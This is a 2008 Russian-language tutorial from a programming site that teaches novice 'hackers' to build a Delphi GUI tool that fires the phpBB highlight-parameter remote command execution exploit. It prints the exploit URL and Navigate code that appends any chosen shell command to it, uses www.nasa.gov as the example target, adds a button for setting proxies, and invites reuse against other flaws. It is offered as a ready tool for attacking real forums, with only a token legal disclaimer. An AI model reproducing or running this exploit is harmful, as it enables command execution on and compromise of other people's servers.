Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
21 ошибка прогр... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Пример работы с... 65535
Содержание сайт... 65535
ТЕХНОЛОГИИ ДОСТ... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Создание отчето... 65535
Имитационное мо... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Реклама
Описание Artdiscount на сайте.
Сейчас на сайте
Гостей: 18
На сайте нет зарегистрированных пользователей

Пользователей: 13,361
новичок: uehuat
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

моделирование процесса поступления заявок в ЭВМ на GPSS + Пояснительная ...
База данных студентов на Delphi + Microsoft SQL Server
База данных - рабочее место кассира на Delphi + бд Access

Написание детских эксплойтов
Здарова, юный кулхацкер, сегодня я расскажу тебе
как самому написать “десткий” эксплоит,

вернее это больше похоже на облегчение использования эксплойта, почему так, ты
поймёшь в процессе чтения. Я существо ленивое :) и именно лень толкнула меня
написать описываемый здесь пример. Просто меня задолбало каждый раз лазить в
текстовый файлик, копировать оттуда строку с эксплойтом и вставлять её в окошко
браузера.

Мы всё будем писать на Delphi т.к. он сейчас популярен среди начинающих хацкеров
и не только.

Итак, преступим!

Ты наверное слышал о огромной дыре в phpBB через которую можно было выпонять
команды на сервере. Вот сам эксплоит –



[site]/forum/viewtopic.php?t=7&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=команда



Скажи, тебе охота каждый раз, найдя бажный форум, лезть в текстовик, копировать
строку с эксплойтом и вставлять её в браузер? Мне тоже, поэтому я и написал
следующую вещь.

Весь код писался на Delphi 6 но мне кажется и в других версиях не будет проблем.


Главное чтоб в версии делфи которую ты юзаешь был компонент WebBrowser.
Остальные компоненты вроде бы имеются во всех версиях.

Зайди в делфи и создай новый проект. На форме размести следующие компоненты:

1.WebBrowser (1 штука)

2.Edit (3 штуки)

3.Lable (3 штуки)

4.Button (1 штука)

Затем назови поля Edit следующими именами – AdresEdit, CmdEdit и TopicEdit

В свойстве Caption, компонентов lable, впиши следующее – Номер топика, Адресс
сайта, Команда.

И Caption кнопки измени на go!

Итак сам кодинг!

Размести компоненты на форме так чтобы тебе было удобно потом пользоватся.

Теперь два раза щёлкни на кнопку go! , создастся обработчик события OnClick.

Затем между begin и end введи

 




WebBrowser1.Navigate(AdresEdit.text+'viewtopic.php?t=
'+TopicEdit+'&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd='+CmdEdit.text);





Этот код пиши одной строкой.

Сейчас всё обьясню. Оператор WebBrowser1.Navigate отвечает за адресную строку, у
нас идёт следующее обращение – сначала берётся строка из поля AdressEdit
(например: www.nasa.gov/forum/) затем к ней прибовляется строка
“viewtopic.php?t=” таким образом у нас уже получается строка www.nasa.gov/forum/viewtopic.php?t=
, затем берётся число из поля TopicEdit (если на атакуемом форуме несуществует
топика с указанным тобою номером то эксплоит несработает а выдаст сообщение о не
существовании темы),допустим ты ввёл 59, тогда получается строка www.nasa.gov/forum/viewtopic.php?t=59

Затем ко всему этому пребовляется строка

“&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=” и получается у нас

www.nasa.gov/forum/viewtopic.php?t=59&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=


Теперь после знака “=” прибавляется то что ты набрал в строке CmdEdit (к примеру
ls).

Вот и получается строка обращения компонента WebBrowser

 


www.nasa.gov/forum/viewtopic.php?
t=59&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=ls





Результат этого запроса тут-же отобразится в компоненте WebBrowser.

Теперь тебе не придётся лазить за эксплоитом в текстовик а достаточно просто
запустить скомпилёный экзешник и набрать там адрес, номер топика и желаемую
тобой команду.

Обрати внимание что адресс должен содержать и путь к папке с форумом, например
www.nasa.gov/phpBB2/ или www.site.com/forum/

Кстати, при использовании компонента WebBrowser появляется одна интересная
возможность, дело в том что этот компонент непосредственно связан с IE и берёт
все настройки из него, в том числе и настройки проксика :). Ты думаешь что тебе
каждый раз придётся лазить в IE и менять настройки? Ты ошибаешся, можно это
оформить и в самой нашей проге.

В Delphi есть полезная функция ShellExecute она отвечает за запуск *.cpl файлов.
В cpl файлах хранятся настройки винды, например настройки рабочего стола. Но нам
нужны настройки IE. Это тоже можно реализовать. На форме своей проги размести
ещё одну кнопку и назови её “Настройки” или чтонить типа этого. Два раза кликни
на эту кнопку и между begin и end впиши следующее:

 


ShellExecute(Application.Handle, Pchar('Open'),

Pchar('Rundll32.exe'), Pchar('shell32, Control_RunDLL inetcpl.cpl'),

'', SW_SHOWNORMAL);





inetcpl.cpl – это имя cpl файла, в котором хранятся настройки, в разных виндах
файл может называться по разному, так что если не получится то попробуй в поиске
набрать *.cpl и среди найденных файлов найдите похожие по смыслу, подставляй их
имена заместо inetcpl.cpl и пробуй :), Теперь прямо из своей проги ты можешь
настроить проксик и прочее.

Надеюсь тебе не составит труда перебить эксплоит под какую нибудб другую
уязвимость :)



Предупреждаю что применение данного сплойта могут повлечь за собой уголовную
ответственность, за вред причиненный вышеописаной программой автор
ответственности не несет!!!
Опубликовал Kest October 25 2008 11:32:56 · 0 Комментариев · 15008 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
CoolDev TipsSyste...
Java 2. Наиболее ...
RSS Feeds
CwstatusBar
Scrrlcaptoin
Fig [Исходник на ...
Основы программир...
DS_Group
Indy in Depth Глу...
EditNew
FormShape [Исходн...
PDJ Scrollers
MiniChat
FreeSMS v1.3.1
PBEditPack
БД сеть компьютер...
CS:Source - монит...
Encrypt Decrypt
Длинный заголовок...
Tenis [Исходник н...

Топ загрузок
Приложение Клие... 100772
Delphi 7 Enterp... 97809
Converter AMR<-... 20261
GPSS World Stud... 17014
Borland C++Buil... 14189
Borland Delphi ... 10267
Turbo Pascal fo... 7372
Калькулятор [Ис... 5972
Visual Studio 2... 5206
Microsoft SQL S... 3661
Случайные статьи
2. Приведенные ниж...
Принцип подстановки
Шаблоны классов
Чтобы туннельный р...
Процедура MoveRel ...
Для каждого указат...
Протокол MGCP
Изменение активной...
Организация взаимо...
Что такое Windows ...
Information Center...
Инструменты раздел...
Интерфейс и его де...
Приемы проверочных...
Определение параме...
Управление изменен...
Вычисление чисел Ф...
Концентрированное ...
S-Video
Линия тренда
Управляющая директ...
• Administrators (...
Безлимитный хостинг
дополнительных ОГП...
Ограничения модемов
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?